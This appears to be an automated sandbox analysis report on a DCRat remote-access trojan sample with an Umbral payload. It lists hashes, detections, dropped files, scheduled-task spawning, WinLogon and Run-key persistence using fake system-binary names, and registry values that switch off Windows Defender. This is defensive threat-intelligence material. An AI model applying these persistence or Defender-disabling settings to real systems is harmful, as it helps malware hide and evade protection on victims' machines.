Analysis
-
max time kernel
140s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-10-2024 07:41
Static task
static1
Behavioral task
behavioral1
Sample
BBD6FFDB33259778F08704696A04891F.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BBD6FFDB33259778F08704696A04891F.exe
Resource
win10v2004-20241007-en
General
-
Target
BBD6FFDB33259778F08704696A04891F.exe
-
Size
12.7MB
-
MD5
bbd6ffdb33259778f08704696a04891f
-
SHA1
0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
-
SHA256
841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
-
SHA512
1b66f11b3a3dea1e6a8f4f7ee493437a41e30704d1c80048efd245184a447fde6abf06fe45af0663a72b30b657a7297554df8c3af7b36ae2e0df21a5031a34e0
-
SSDEEP
393216:2JlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8X:2bQpgssCKInwjJaMc
Malware Config
Signatures
-
DcRat 50 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeBBD6FFDB33259778F08704696A04891F.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeportrefNet.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3480 schtasks.exe 3184 schtasks.exe 4744 schtasks.exe 2648 schtasks.exe 3204 schtasks.exe 872 schtasks.exe 4620 schtasks.exe 3952 schtasks.exe 2148 schtasks.exe 4452 schtasks.exe 4180 schtasks.exe 456 schtasks.exe 1172 schtasks.exe 548 schtasks.exe 924 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BBD6FFDB33259778F08704696A04891F.exe 2336 schtasks.exe 2996 schtasks.exe 4404 schtasks.exe 2164 schtasks.exe 3036 schtasks.exe 4504 schtasks.exe 2756 schtasks.exe 1044 schtasks.exe 556 schtasks.exe 984 schtasks.exe File created C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\55b276f4edf653 portrefNet.exe 2752 schtasks.exe 4924 schtasks.exe 4852 schtasks.exe 4424 schtasks.exe 208 schtasks.exe 1056 schtasks.exe 3748 schtasks.exe 552 schtasks.exe 1904 schtasks.exe 2576 schtasks.exe 2608 schtasks.exe 4904 schtasks.exe 432 schtasks.exe 4460 schtasks.exe 3220 schtasks.exe 1096 schtasks.exe 956 schtasks.exe 2064 schtasks.exe 3852 schtasks.exe 4748 schtasks.exe 3472 schtasks.exe 3944 schtasks.exe 4552 schtasks.exe -
Dcrat family
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe family_umbral behavioral2/memory/4508-61-0x0000019CFA1E0000-0x0000019CFA220000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 16 IoCs
Processes:
portrefNet.exeportrefNet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\", \"C:\\blockweb\\upfc.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Program Files\\Windows Portable Devices\\lsass.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Program Files\\Windows Portable Devices\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Filters\\csrss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Program Files\\Windows Portable Devices\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Program Files\\Windows Portable Devices\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Filters\\csrss.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\csrss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\", \"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\", \"C:\\Program Files\\Windows Media Player\\taskhostw.exe\", \"C:\\blockweb\\smss.exe\", \"C:\\Windows\\Vss\\services.exe\", \"C:\\blockweb\\services.exe\", \"C:\\Windows\\Speech_OneCore\\smss.exe\", \"C:\\blockweb\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\blockweb\\fontdrvhost.exe\"" portrefNet.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2336 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3480 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2996 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2608 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 552 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4180 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 432 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4404 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4744 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4924 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 956 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2648 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 456 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3204 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 872 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1172 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2164 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3944 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2064 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4852 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4424 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 208 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 548 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1056 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3852 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3036 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4504 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1904 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4460 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3220 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3952 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4552 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4748 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1096 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3472 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 924 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4452 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 556 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 984 4040 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2576 4040 schtasks.exe -
Umbral family
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe dcrat C:\blockweb\portrefNet.exe dcrat behavioral2/memory/4016-81-0x0000000000D00000-0x0000000000F3A000-memory.dmp dcrat -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
BBD6FFDB33259778F08704696A04891F.exeLunch LaCheatV2.exeLunch LaCheat.exeDCRatBuild.exeWScript.exeportrefNet.exeportrefNet.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation BBD6FFDB33259778F08704696A04891F.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Lunch LaCheatV2.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Lunch LaCheat.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation DCRatBuild.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation portrefNet.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation portrefNet.exe -
Executes dropped EXE 7 IoCs
Processes:
Lunch LaCheatV2.exeLunch LaCheat.exeDCRatBuild.exe52cheatand52rat.exeportrefNet.exeportrefNet.exedllhost.exepid process 2468 Lunch LaCheatV2.exe 3092 Lunch LaCheat.exe 3852 DCRatBuild.exe 4508 52cheatand52rat.exe 4016 portrefNet.exe 1740 portrefNet.exe 2636 dllhost.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe vmprotect behavioral2/memory/2468-24-0x0000000000400000-0x0000000001B6B000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe vmprotect behavioral2/memory/2468-33-0x0000000000400000-0x0000000001B6B000-memory.dmp vmprotect behavioral2/memory/3092-42-0x0000000000400000-0x00000000018F3000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 30 IoCs
Processes:
portrefNet.exeportrefNet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MoUsoCoreWorker = "\"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Speech_OneCore\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\blockweb\\upfc.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MoUsoCoreWorker = "\"C:\\Users\\Admin\\Favorites\\MoUsoCoreWorker.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\Vss\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\blockweb\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\blockweb\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\blockweb\\fontdrvhost.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Portable Devices\\lsass.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Google\\Chrome\\Application\\csrss.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\blockweb\\upfc.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Windows\\assembly\\GAC_64\\srmlib\\1.0.0.0__31bf3856ad364e35\\StartMenuExperienceHost.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\blockweb\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Speech_OneCore\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\blockweb\\fontdrvhost.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Filters\\csrss.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Google\\Chrome\\Application\\csrss.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files\\Windows Media Player\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files\\Windows Media 